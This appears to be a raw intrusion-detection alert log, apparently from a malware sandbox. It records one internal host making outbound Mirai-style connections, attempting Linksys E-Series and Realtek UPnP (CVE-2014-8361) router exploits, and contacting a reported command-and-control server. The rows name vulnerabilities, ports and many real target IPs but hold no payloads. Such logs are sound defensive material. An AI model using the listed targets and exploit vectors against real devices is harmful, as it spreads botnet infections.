              192.168.2.23156.244.73.24855328528692027339 05/14/22-02:05:36.552777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5532852869192.168.2.23156.244.73.248
              192.168.2.2388.221.185.19260438802027121 05/14/22-02:04:43.365152TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6043880192.168.2.2388.221.185.192
              192.168.2.23172.65.182.9446454555552027153 05/14/22-02:05:33.583579TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4645455555192.168.2.23172.65.182.94
              192.168.2.23172.65.91.11560806555552027153 05/14/22-02:05:37.001586TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6080655555192.168.2.23172.65.91.115
              192.168.2.23172.65.57.8539362555552027153 05/14/22-02:05:41.244138TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3936255555192.168.2.23172.65.57.85
              192.168.2.2388.87.90.24859292802027121 05/14/22-02:04:40.936768TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5929280192.168.2.2388.87.90.248
              192.168.2.2398.159.33.22754498555552027153 05/14/22-02:05:24.949664TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5449855555192.168.2.2398.159.33.227
              192.168.2.2388.221.190.7657518802027121 05/14/22-02:04:43.334647TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5751880192.168.2.2388.221.190.76
              192.168.2.23172.65.111.10460754555552027153 05/14/22-02:05:30.411524TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6075455555192.168.2.23172.65.111.104
              192.168.2.2395.101.251.4640078802027121 05/14/22-02:04:21.759965TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4007880192.168.2.2395.101.251.46
              192.168.2.2395.101.188.4252034802027121 05/14/22-02:03:55.661108TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5203480192.168.2.2395.101.188.42
              192.168.2.2395.46.155.18954704802027121 05/14/22-02:05:45.538592TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5470480192.168.2.2395.46.155.189
              192.168.2.2395.57.137.24547588802027121 05/14/22-02:05:19.828046TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4758880192.168.2.2395.57.137.245
              192.168.2.2388.221.127.4059250802027121 05/14/22-02:04:58.556033TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5925080192.168.2.2388.221.127.40
              192.168.2.2388.221.35.8157028802027121 05/14/22-02:04:32.325392TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5702880192.168.2.2388.221.35.81
              192.168.2.2388.231.21.15459472802027121 05/14/22-02:03:57.843382TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5947280192.168.2.2388.231.21.154
              192.168.2.23156.250.126.15040666528692027339 05/14/22-02:05:50.398115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4066652869192.168.2.23156.250.126.150
              192.168.2.23172.65.233.23444670555552027153 05/14/22-02:04:57.329185TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4467055555192.168.2.23172.65.233.234
              192.168.2.2388.99.27.2959630802027121 05/14/22-02:04:04.408250TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5963080192.168.2.2388.99.27.29
              192.168.2.2395.180.146.2538416802027121 05/14/22-02:04:30.926544TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3841680192.168.2.2395.180.146.25
              192.168.2.2395.216.87.15359114802027121 05/14/22-02:03:53.362973TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5911480192.168.2.2395.216.87.153
              192.168.2.23172.65.86.641400555552027153 05/14/22-02:04:36.974233TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4140055555192.168.2.23172.65.86.6
              192.168.2.2388.99.6.15337118802027121 05/14/22-02:04:57.386875TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3711880192.168.2.2388.99.6.153
              192.168.2.2388.34.183.10636654802027121 05/14/22-02:05:33.094042TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3665480192.168.2.2388.34.183.106
              192.168.2.2395.168.168.16852616802027121 05/14/22-02:03:57.738061TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5261680192.168.2.2395.168.168.168
              192.168.2.2395.183.37.14041168802027121 05/14/22-02:04:17.287353TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4116880192.168.2.2395.183.37.140
              192.168.2.2395.216.49.24535130802027121 05/14/22-02:04:57.381704TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3513080192.168.2.2395.216.49.245
              192.168.2.2388.99.32.23139366802027121 05/14/22-02:04:29.747000TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3936680192.168.2.2388.99.32.231
              192.168.2.2395.223.191.17654308802027121 05/14/22-02:04:00.998864TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5430880192.168.2.2395.223.191.176
              192.168.2.2395.142.39.19040324802027121 05/14/22-02:03:53.377984TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4032480192.168.2.2395.142.39.190
              192.168.2.2395.100.151.5035770802027121 05/14/22-02:04:55.171540TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3577080192.168.2.2395.100.151.50
              192.168.2.23172.65.199.22734996555552027153 05/14/22-02:05:37.018864TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3499655555192.168.2.23172.65.199.227
              192.168.2.23172.65.86.1447446555552027153 05/14/22-02:04:11.654959TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4744655555192.168.2.23172.65.86.14
              192.168.2.23156.254.70.11738860528692027339 05/14/22-02:05:37.010525TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3886052869192.168.2.23156.254.70.117
              192.168.2.23172.65.246.22549336555552027153 05/14/22-02:04:31.062353TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4933655555192.168.2.23172.65.246.225
              192.168.2.2388.221.250.12036710802027121 05/14/22-02:04:30.978771TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3671080192.168.2.2388.221.250.120
              192.168.2.2388.218.158.14353512802027121 05/14/22-02:04:32.244935TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5351280192.168.2.2388.218.158.143
              192.168.2.23172.65.105.8740248555552027153 05/14/22-02:04:31.062442TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4024855555192.168.2.23172.65.105.87
              192.168.2.23172.245.113.11138934555552027153 05/14/22-02:04:07.379640TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3893455555192.168.2.23172.245.113.111
              192.168.2.2388.193.184.6838586802027121 05/14/22-02:05:47.764684TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3858680192.168.2.2388.193.184.68
              192.168.2.2388.151.120.23954648802027121 05/14/22-02:04:19.380599TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5464880192.168.2.2388.151.120.239
              192.168.2.23156.240.108.22955326528692027339 05/14/22-02:04:51.841222TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5532652869192.168.2.23156.240.108.229
              192.168.2.23156.226.61.7735510528692027339 05/14/22-02:05:03.298472TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3551052869192.168.2.23156.226.61.77
              192.168.2.23172.245.25.841564555552027153 05/14/22-02:05:04.432633TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4156455555192.168.2.23172.245.25.8
              192.168.2.2388.99.145.7544708802027121 05/14/22-02:05:02.936838TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4470880192.168.2.2388.99.145.75
              192.168.2.2395.129.189.1153350802027121 05/14/22-02:04:07.881985TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5335080192.168.2.2395.129.189.11
              192.168.2.2388.247.119.14756892802027121 05/14/22-02:04:19.409992TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5689280192.168.2.2388.247.119.147
              192.168.2.23172.65.48.24341020555552027153 05/14/22-02:04:43.913081TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4102055555192.168.2.23172.65.48.243
              192.168.2.2395.77.11.1836288802027121 05/14/22-02:05:08.836665TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3628880192.168.2.2395.77.11.18
              192.168.2.2395.214.218.12438414802027121 05/14/22-02:04:01.070491TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3841480192.168.2.2395.214.218.124
              192.168.2.2395.110.236.2245362802027121 05/14/22-02:04:09.284651TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4536280192.168.2.2395.110.236.22
              192.168.2.2395.183.15.22143498802027121 05/14/22-02:04:23.251318TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4349880192.168.2.2395.183.15.221
              192.168.2.23172.65.69.15046380555552027153 05/14/22-02:05:37.019008TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4638055555192.168.2.23172.65.69.150
              192.168.2.23172.65.116.5734996555552027153 05/14/22-02:04:24.881978TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3499655555192.168.2.23172.65.116.57
              192.168.2.2388.147.144.12557076802027121 05/14/22-02:04:30.883444TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5707680192.168.2.2388.147.144.125
              192.168.2.23172.65.241.9347344555552027153 05/14/22-02:04:57.312233TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4734455555192.168.2.23172.65.241.93
              192.168.2.23172.65.132.19643310555552027153 05/14/22-02:05:06.220049TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4331055555192.168.2.23172.65.132.196
              192.168.2.2395.100.182.17258936802027121 05/14/22-02:04:23.192380TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5893680192.168.2.2395.100.182.172
              192.168.2.23172.65.201.18036496555552027153 05/14/22-02:05:45.978084TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3649655555192.168.2.23172.65.201.180
              192.168.2.2395.86.206.24037732802027121 05/14/22-02:05:28.581595TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3773280192.168.2.2395.86.206.240
              192.168.2.23156.245.59.23446694528692027339 05/14/22-02:05:37.070954TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4669452869192.168.2.23156.245.59.234
              192.168.2.23172.65.230.2638578555552027153 05/14/22-02:05:45.960758TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3857855555192.168.2.23172.65.230.26
              192.168.2.2395.142.39.19040332802027121 05/14/22-02:03:53.460756TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4033280192.168.2.2395.142.39.190
              192.168.2.2395.101.10.13145578802027121 05/14/22-02:04:34.509938TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4557880192.168.2.2395.101.10.131
              192.168.2.2395.111.227.22049974802027121 05/14/22-02:04:25.535524TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4997480192.168.2.2395.111.227.220
              192.168.2.23172.65.79.23345034555552027153 05/14/22-02:05:54.037713TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4503455555192.168.2.23172.65.79.233
              192.168.2.23197.44.95.23339792528692027339 05/14/22-02:05:48.080780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3979252869192.168.2.23197.44.95.233
              192.168.2.2395.101.179.21840834802027121 05/14/22-02:04:21.731177TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4083480192.168.2.2395.101.179.218
              192.168.2.2395.84.209.12444178802027121 05/14/22-02:04:34.530155TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4417880192.168.2.2395.84.209.124
              192.168.2.2388.221.241.16646476802027121 05/14/22-02:04:45.587757TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4647680192.168.2.2388.221.241.166
              192.168.2.23172.65.43.9648762555552027153 05/14/22-02:04:04.201524TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4876255555192.168.2.23172.65.43.96
              192.168.2.23172.65.147.2144500555552027153 05/14/22-02:05:24.831840TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4450055555192.168.2.23172.65.147.21
              192.168.2.2388.53.121.22358244802027121 05/14/22-02:05:36.550041TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5824480192.168.2.2388.53.121.223
              192.168.2.23172.65.244.18337580555552027153 05/14/22-02:05:21.335692TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3758055555192.168.2.23172.65.244.183
              192.168.2.2395.217.234.23742976802027121 05/14/22-02:04:45.496386TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4297680192.168.2.2395.217.234.237
              192.168.2.2388.22.77.1933586802027121 05/14/22-02:05:16.374618TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3358680192.168.2.2388.22.77.19
              192.168.2.23172.245.103.9646626555552027153 05/14/22-02:05:21.142244TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4662655555192.168.2.23172.245.103.96
              192.168.2.2395.217.177.21652404802027121 05/14/22-02:04:01.012402TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5240480192.168.2.2395.217.177.216
              192.168.2.2388.217.172.16433898802027121 05/14/22-02:04:32.232576TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3389880192.168.2.2388.217.172.164
              192.168.2.2388.247.4.1542394802027121 05/14/22-02:03:57.818353TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4239480192.168.2.2388.247.4.15
              192.168.2.23172.65.190.19056196555552027153 05/14/22-02:05:09.759089TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5619655555192.168.2.23172.65.190.190
              192.168.2.2388.99.106.22060562802027121 05/14/22-02:04:21.715165TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6056280192.168.2.2388.99.106.220
              192.168.2.2388.221.156.3548314802027121 05/14/22-02:04:58.613996TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4831480192.168.2.2388.221.156.35
              192.168.2.2388.255.170.1759020802027121 05/14/22-02:04:37.610970TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5902080192.168.2.2388.255.170.17
              192.168.2.23172.65.46.159140555552027153 05/14/22-02:05:16.317135TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5914055555192.168.2.23172.65.46.1
              192.168.2.2395.90.100.25360968802027121 05/14/22-02:04:45.495189TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6096880192.168.2.2395.90.100.253
              192.168.2.2395.100.10.2758494802027121 05/14/22-02:05:23.036314TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5849480192.168.2.2395.100.10.27
              192.168.2.2388.151.120.23954218802027121 05/14/22-02:04:04.436112TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5421880192.168.2.2388.151.120.239
              192.168.2.2395.217.74.2949830802027121 05/14/22-02:04:48.048276TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4983080192.168.2.2395.217.74.29
              192.168.2.23172.65.41.23933628555552027153 05/14/22-02:05:09.761720TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3362855555192.168.2.23172.65.41.239
              192.168.2.23172.65.91.6249884555552027153 05/14/22-02:03:52.401161TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4988455555192.168.2.23172.65.91.62
              192.168.2.2395.217.171.18950806802027121 05/14/22-02:05:03.000835TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5080680192.168.2.2395.217.171.189
              192.168.2.23172.245.107.23640466555552027153 05/14/22-02:05:04.432766TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4046655555192.168.2.23172.245.107.236
              192.168.2.2395.211.48.23437548802027121 05/14/22-02:04:29.723243TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3754880192.168.2.2395.211.48.234
              192.168.2.2395.143.49.23841548802027121 05/14/22-02:04:09.265829TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4154880192.168.2.2395.143.49.238
              192.168.2.2395.216.113.23540052802027121 05/14/22-02:04:19.433599TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4005280192.168.2.2395.216.113.235
              192.168.2.2388.99.250.9638340802027121 05/14/22-02:03:57.760926TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3834080192.168.2.2388.99.250.96
              192.168.2.2395.110.188.5850186802027121 05/14/22-02:04:21.767738TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5018680192.168.2.2395.110.188.58
              192.168.2.23172.65.147.24056508555552027153 05/14/22-02:04:15.724140TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5650855555192.168.2.23172.65.147.240
              192.168.2.23172.65.7.17351778555552027153 05/14/22-02:04:34.703705TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5177855555192.168.2.23172.65.7.173
              192.168.2.23172.65.227.13246070555552027153 05/14/22-02:05:09.758844TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4607055555192.168.2.23172.65.227.132
              192.168.2.23172.65.94.14451176555552027153 05/14/22-02:04:19.383126TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5117655555192.168.2.23172.65.94.144
              192.168.2.2388.99.0.5634224802027121 05/14/22-02:04:40.793936TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3422480192.168.2.2388.99.0.56
              192.168.2.23156.245.35.20639160528692027339 05/14/22-02:04:01.120042TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3916052869192.168.2.23156.245.35.206
              192.168.2.23172.65.203.15944186555552027153 05/14/22-02:03:58.555655TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4418655555192.168.2.23172.65.203.159
              192.168.2.23172.65.205.16052354555552027153 05/14/22-02:04:49.789360TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5235455555192.168.2.23172.65.205.160
              192.168.2.23156.226.100.4157032528692027339 05/14/22-02:05:04.864593TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5703252869192.168.2.23156.226.100.41
              192.168.2.2395.216.241.21038106802027121 05/14/22-02:04:50.438289TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3810680192.168.2.2395.216.241.210
              192.168.2.2388.151.115.2648772802027121 05/14/22-02:04:09.698765TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4877280192.168.2.2388.151.115.26
              192.168.2.2388.248.100.21059808802027121 05/14/22-02:04:45.455125TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5980880192.168.2.2388.248.100.210
              192.168.2.23172.65.170.20642126555552027153 05/14/22-02:05:04.147038TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4212655555192.168.2.23172.65.170.206
              192.168.2.2388.221.247.4656332802027121 05/14/22-02:05:16.728469TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5633280192.168.2.2388.221.247.46
              192.168.2.2395.65.48.2244716802027121 05/14/22-02:04:23.241574TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4471680192.168.2.2395.65.48.22
              192.168.2.23156.254.86.10347550528692027339 05/14/22-02:05:02.793230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4755052869192.168.2.23156.254.86.103
              192.168.2.23172.65.116.24337208555552027153 05/14/22-02:03:58.555471TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3720855555192.168.2.23172.65.116.243
              192.168.2.23172.65.196.12241800555552027153 05/14/22-02:05:37.001489TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4180055555192.168.2.23172.65.196.122
              192.168.2.2388.151.50.2139518802027121 05/14/22-02:05:23.027466TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3951880192.168.2.2388.151.50.21
              192.168.2.2395.245.176.10047458802027121 05/14/22-02:04:02.312326TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4745880192.168.2.2395.245.176.100
              192.168.2.23156.254.85.2345610528692027339 05/14/22-02:05:12.491233TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4561052869192.168.2.23156.254.85.23
              192.168.2.2388.198.176.12760206802027121 05/14/22-02:04:13.144517TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6020680192.168.2.2388.198.176.127
              192.168.2.2388.221.10.20254556802027121 05/14/22-02:04:52.747584TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5455680192.168.2.2388.221.10.202
              192.168.2.23172.65.36.17548486555552027153 05/14/22-02:04:57.312175TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4848655555192.168.2.23172.65.36.175
              192.168.2.2388.247.120.10250276802027121 05/14/22-02:05:50.075434TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5027680192.168.2.2388.247.120.102
              192.168.2.2388.221.18.13558280802027121 05/14/22-02:04:32.272004TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5828080192.168.2.2388.221.18.135
              192.168.2.2395.101.189.5648426802027121 05/14/22-02:03:55.661040TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4842680192.168.2.2395.101.189.56
              192.168.2.23172.65.214.1560194555552027153 05/14/22-02:05:20.978194TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6019455555192.168.2.23172.65.214.15
              192.168.2.2395.100.77.4953544802027121 05/14/22-02:05:23.001580TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5354480192.168.2.2395.100.77.49
              192.168.2.2395.91.29.21342706802027121 05/14/22-02:05:19.755389TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4270680192.168.2.2395.91.29.213
              192.168.2.23172.65.97.20051602555552027153 05/14/22-02:04:34.685570TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5160255555192.168.2.23172.65.97.200
              192.168.2.2395.65.25.2359674802027121 05/14/22-02:04:09.303014TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5967480192.168.2.2395.65.25.23
              192.168.2.2398.159.33.13042202555552027153 05/14/22-02:04:46.257949TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4220255555192.168.2.2398.159.33.130
              192.168.2.2388.221.136.7740648802027121 05/14/22-02:04:43.322465TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4064880192.168.2.2388.221.136.77
              192.168.2.2395.101.241.19859824802027121 05/14/22-02:04:43.339295TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5982480192.168.2.2395.101.241.198
              192.168.2.2395.216.236.17850606802027121 05/14/22-02:05:45.541757TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5060680192.168.2.2395.216.236.178
              192.168.2.2388.148.137.22246540802027121 05/14/22-02:04:40.840279TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4654080192.168.2.2388.148.137.222
              192.168.2.2388.221.138.14732984802027121 05/14/22-02:05:27.261197TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3298480192.168.2.2388.221.138.147
              192.168.2.2395.211.221.12139408802027121 05/14/22-02:04:21.756854TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3940880192.168.2.2395.211.221.121
              192.168.2.2388.226.220.15637282802027121 05/14/22-02:05:04.229140TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3728280192.168.2.2388.226.220.156
              192.168.2.2395.148.139.3154776802027121 05/14/22-02:04:50.437562TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5477680192.168.2.2395.148.139.31
              192.168.2.2388.31.6.11359422802027121 05/14/22-02:04:58.535677TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5942280192.168.2.2388.31.6.113
              192.168.2.2388.148.49.4251404802027121 05/14/22-02:04:48.007218TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5140480192.168.2.2388.148.49.42
              192.168.2.2388.99.101.20254734802027121 05/14/22-02:04:01.022090TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5473480192.168.2.2388.99.101.202
              192.168.2.23172.65.50.23143836555552027153 05/14/22-02:05:41.244057TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4383655555192.168.2.23172.65.50.231
              192.168.2.2388.202.226.21658762802027121 05/14/22-02:04:32.259524TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5876280192.168.2.2388.202.226.216
              192.168.2.23172.65.98.13860678555552027153 05/14/22-02:04:50.716191TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6067855555192.168.2.23172.65.98.138
              192.168.2.23172.65.50.6848506555552027153 05/14/22-02:04:13.394170TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4850655555192.168.2.23172.65.50.68
              192.168.2.23172.65.203.9147194555552027153 05/14/22-02:05:18.632714TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4719455555192.168.2.23172.65.203.91
              192.168.2.23172.65.225.22251082555552027153 05/14/22-02:04:31.045044TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5108255555192.168.2.23172.65.225.222
              192.168.2.2395.100.119.3360388802027121 05/14/22-02:04:55.076014TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6038880192.168.2.2395.100.119.33
              192.168.2.2388.31.225.15836930802027121 05/14/22-02:04:58.537628TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3693080192.168.2.2388.31.225.158
              192.168.2.2395.219.212.2959618802027121 05/14/22-02:05:00.802432TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5961880192.168.2.2395.219.212.29
              192.168.2.23172.65.20.20039984555552027153 05/14/22-02:05:04.335191TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3998455555192.168.2.23172.65.20.200
              192.168.2.23172.65.105.20040100555552027153 05/14/22-02:04:46.275094TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4010055555192.168.2.23172.65.105.200
              192.168.2.23156.244.78.20139706528692027339 05/14/22-02:05:33.351834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3970652869192.168.2.23156.244.78.201
              192.168.2.23172.65.187.2835410555552027153 05/14/22-02:05:43.557994TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3541055555192.168.2.23172.65.187.28
              192.168.2.2362.75.251.601461880802404338 05/14/22-02:04:37.171076TCP2404338ET CNC Feodo Tracker Reported CnC Server TCP group 20146188080192.168.2.2362.75.251.60
              192.168.2.23172.65.190.18233602555552027153 05/14/22-02:05:24.831916TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3360255555192.168.2.23172.65.190.182
              192.168.2.2388.147.251.7849714802027121 05/14/22-02:05:52.722920TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4971480192.168.2.2388.147.251.78
              192.168.2.2395.216.247.24048722802027121 05/14/22-02:03:53.362682TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4872280192.168.2.2395.216.247.240
              192.168.2.2388.249.57.15956710802027121 05/14/22-02:04:55.177371TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5671080192.168.2.2388.249.57.159
              192.168.2.2395.100.222.3448534802027121 05/14/22-02:04:57.385948TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4853480192.168.2.2395.100.222.34
              192.168.2.23172.65.1.10954966555552027153 05/14/22-02:05:45.960834TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5496655555192.168.2.23172.65.1.109
              192.168.2.2388.79.138.16058010802027121 05/14/22-02:04:19.377128TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5801080192.168.2.2388.79.138.160
